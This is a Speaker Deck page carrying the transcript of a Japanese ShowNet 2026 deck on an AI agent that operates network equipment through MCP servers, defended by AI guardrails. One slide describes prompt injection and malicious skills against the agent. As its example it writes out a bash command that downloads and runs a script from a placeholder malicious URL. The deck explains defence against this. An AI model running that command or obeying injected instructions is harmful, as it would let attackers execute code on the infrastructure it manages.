Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Sign up for free
Menu
Search
Features
All features
Private URLs
Password Protection
Custom URLS
Scheduled publishing
Remove Branding
Restrict embedding
Deck Collections
Notes
Features
All features
Private URLs
Password Protection
Custom URLS
Scheduled publishing
Remove Branding
Restrict embedding
Deck Collections
Notes
Explore
Featured decks
Featured speakers
Programming
Technology
Storyboards
Explore
Featured decks
Featured speakers
Programming
Technology
Storyboards
Pricing
Search
Sign in
Sign up for free
【ShowNet 2026 展示会場内説明スライド】LLM
Search
ShowNet
PRO
August 04, 2026
310
0
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
【ShowNet 2026 展示会場内説明スライド】LLM
生成AI Agentの利用デモ@ShowNet2026
ShowNet
PRO
August 04, 2026
More Decks by ShowNet
See All by ShowNet
【swonet.conf_ 2026】SC1-01_オープニングセッション
shownet
PRO
0
68
【swonet.conf_ 2026】SC1-02_トポロジー図の歩き方
shownet
PRO
0
100
【swonet.conf_ 2026】SC1-03_ShowNetで探る、液冷(水冷)システムの実装可能性
shownet
PRO
0
84
【swonet.conf_ 2026】SC1-04_"高密度化/自動化への挑戦"と"繋がる当たり前"の共存
shownet
PRO
0
62
【swonet.conf_ 2026】SC1-05_ShowNet 2026で見えた次世代伝送の方向性
shownet
PRO
0
69
【swonet.conf_ 2026】SC1-06_ルーティングセキュリティと広帯域化で具現化する対外接続の未来
shownet
PRO
0
59
【swonet.conf_ 2026】SC1-07_ShowNetバックボーンを支えるテクノロジー
shownet
PRO
0
70
【swonet.conf_ 2026】SC1-08_広帯域化するWi-Fiと多様化する通信需要
shownet
PRO
0
60
【swonet.conf_ 2026】SC1-09_実践の場で育む技術と未来
shownet
PRO
0
54
Featured
See All Featured
Avoiding the “Bad Training, Faster” Trap in the Age of AI
tmiket
0
230
Public Speaking Without Barfing On Your Shoes - THAT 2023
reverentgeek
1
560
Are puppies a ranking factor?
jonoalderson
2
3.9k
Faster Mobile Websites
deanohume
310
32k
Neural Spatial Audio Processing for Sound Field Analysis and Control
skoyamalab
0
480
Ecommerce SEO: The Keys for Success Now & Beyond - #SERPConf2024
aleyda
1
2.1k
Digital Projects Gone Horribly Wrong (And the UX Pros Who Still Save the Day) - Dean Schuster
uxyall
1
2.8k
The Invisible Side of Design
smashingmag
301
52k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
49
3.5k
Thoughts on Productivity
jonyablonski
76
5.4k
Bridging the Design Gap: How Collaborative Modelling removes blockers to flow between stakeholders and teams @FastFlow conf
baasie
0
690
Mind Mapping
helmedeiros
1
350
Transcript
LLM
昨年2025年のShowNetでの取り組み 実装したAI ChatbotでShowNetの構築・運用支援実験 ルータ・スイッチのCLI操作 + RAG + チケットアクセス AIはどれほど有用なのかをShowNetでベンチマーク 評価がついたやりとりのうち68.1%がPositiveという結果に
幕張メッセ 質問 (+機器の出力) 質問 実験参加者 netmiko mgmt経由で MCP server SSH越しに ShowNet側装置 CLI操作 応答 コマンド MCP 機器の 出力 Azure OpenAI Service 検索 REST (OpenAI API) Chatbot Web Server 生成した応答 (+機器の操作) LLM Model (GPT-4.1) ttdb チケット MCP server MCP 情報 REST Vector Store Ticket System 2
2025年の実験から明らかになったこと AIによる直接のCLI操作は有用 通算1427コマンドが発行、うち213が失敗(syntax error等) 成功の割合は85.1%、異なるCLIもそれなりに操作できる AIにできることを理解するが大事 AIにできないことを指示しても当然できない 詳細は論文に↓ 3
生成AI Agentの利用デモ@ShowNet 2026 AI Agent (OpenClawベース)をShowNetにて提供 OpenClaw: オープンソースのAI Agentのいち実装 OpenClawへのExtension
人間はCisco Webex経由でAIとやりとり Cisco NSOとNOC作成MCPサーバ経由で ShowNet機器のCLIを操作できる StellaCyber Stella Cyber MCPでセキュリティ Cloud ケースの確認 Cisco NSO Guardrailによる AI Agentへの攻撃対策 CLI ShowNet側装置 MCP Servers Local LLM Inference Engine REST API AI Guardrail Prompt/ Tool Result Response/ Tool Call Agent (Gateway) Tool Call IDENTITY, SOUL, SKILL OpenClaw Shell Webex 4
5
AI Agentへの攻撃 Prompt Injectionや悪意のあるSKILL 例: 挿入されたプロンプトによってAgentが↓を実行したら... /bin/bash -c “$(curl -fsSL
https://[悪意のあるURL])” AgentとLLMの間で入出力を検査するAI Guardrail 入出力を検査 悪性なものはブロック Operator Webex Chat Bot OpenClaw Guardrail LLM 6
6月に世間を騒がせた Dirty Fragの脆弱性 7
DefenseClawがLLMの 出力をブロック 8
現在稼働中のAI Agent as Webex bot AI GuardrailとBackend LLMごとに個別のbotを用意 合計7つのAI agent
botが現在稼働中 Bot Name diagman_defense-claw diagman_prisma-airs diagman_promptsecurity AI Guardrail Cisco Defense Claw Palo Alto Prisma AIRS LLM qwen35-122b qwen35-122b Prompt Security qwen35-122b diagman_ai-guardrails F5 AI Guardrails qwen35-122b diagman_plamo-mncore - diagman_default - diagman_plamo - PFN PLaMo 3.0 Prime β PFN PLaMo 3.0 Prime β for MN-Core (8B) qwen35-122b 9
協力いただいたコントリビュータさま 10